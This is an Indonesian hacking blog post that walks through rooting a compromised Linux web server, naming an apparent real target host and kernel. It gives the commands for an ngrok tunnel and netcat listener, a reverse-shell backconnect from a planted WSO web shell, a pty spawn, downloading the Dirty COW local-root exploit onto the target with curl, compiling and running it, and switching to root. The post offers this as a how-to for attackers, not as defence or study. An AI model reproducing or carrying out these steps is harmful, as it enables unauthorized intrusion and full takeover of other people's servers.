Tutorial Rooting Server With Ngrok - Pixel-Code

Tutorial Rooting Server With Ngrok

Hallo sobat pixel udah lama nih nggak post hehe, Pada kesempatan kali ini gue mau ngasih tutorial dan sedikit pengalaman Rooting Server With Ngrok And Backdoor Shell, Gimana caranya? Yuk simak step by stepnya disini saya sudah mempunyai target dan kernelnya 2015

Linux ns.sukmanuradillah.web.id 2.6.18-407.el5 #1 SMP Wed Nov 11 08:12:41 EST 2015 x86_64

Jika kalian ingin rooting juga pastikan kernel 2014/2015/2016 atau di bawahnya, karena kernel 2017 masih susah karena localrootnya masih belum jelas.

Kalian perlu siapkan bahan bahannya:
1) Netcat : Disini
2) Ngrok : Disini
3) Localroot Dirty : Disini
4) Shell WSO : Disini
4) Shell Spawning : python -c 'import pty; pty.spawn("/bin/sh")'
5) Kernel 2016 / 2015 / 2014 / Kebawah.
6) Ngopi biar nda panik kalo gagal denied :v
(Nb. Untuk shell terserah tapi untuk tutorial disini saya memakai WSO shell)

Pertama kalian buka ngrok kalian, lalu ketik ngrok.exe tcp 1990, Pada angka 1990 kalian juga bebas mau milih angka kalian yang kalian mau

Jika ngroknya sudah connect, Lalu kalian buka netcat kalian nc.exe -lvp 1990 , 1990 itu angka tcp yg kalian setting di ngrok tadi , jika muncul tulisan listening on [any] 1990.... kalian tunggu dan jangan di close

Lalu kita pergi ke shell kita dan lakukan backconnect terlebih dahulu , kita isikan kolom server dan port, Disini saya menggunakan shell wso ya ..
Server = 0.tcp.ngrok.io
Port   = 18312
Notes : Data diatas diambil dari ngrok di bagian tulisan bawah, Dan saya menggunakan perl :
Forwarding tcp://0.tcp.ngrok.io: -> localhost:1990


Dan taraa berhasil backconnect tampilan akan seperti dibawah, kalo denied yaa puter otak lagi :v
Kita lanjut rooting servernya step buat rooting nya, pertama kalian shell spawn;
python -c 'import pty; pty.spawn("/bin/­sh")'
Jika berhasil maka akan kecopy command kita dan perhatikan gambar jika tidak mengerti.

Selanjutnya kita copy dirty.c ke website target kita , ketik: curl (url file dirty.c) -o paw.c

Nama filenya paw.c selanjutnya kita cek apakah file paw.c kita sudah terupload atau belum, caranya kita ketik : ls *.c ,jika sudah terupload akan ada file paw.c seperti gambar dibawah berikut :

Lalu kalian ketik: gcc -pthread paw.c -o paw -lcrypt jika sukses makan tampilan akan seperti dibawah:

Lalu kita berikan akses kalian ketik chmod +x paw

Jika sudah kalian berikan akses maka kita jalankan file dirtya kalian ketik ./paw lalu isikan password sesuka kalian dan tekan enter

Nah disini yang harus nunggu beberapa menit tergantung server nya jika server jelek ya cepet, kalo server bagus lumayan lama :v atau jika disconnect sendiri kalian connect kan lagi, Lalu pencet CTRL+C

Lakukan backconnect ulang dan jangan lupa pasang shell spawning lagi seperti diawal, Tampilan seperti diatas:

Lalu ketikan su , dan masukan password kalian tadi

Jika sudah selanjutnya ketikan id, Dan boom muncul uid=0(root) gid=0(root) groups=0(root) >.< yeay kalian berhasil rooting server.


Oke mungkin cukup sekian semoga bermanfaat  and dont forget to share hehe. See you next time byee~
ThanksTo: Jakarta6etar - Kaizen

0 Response to "Tutorial Rooting Server With Ngrok"

Post a Comment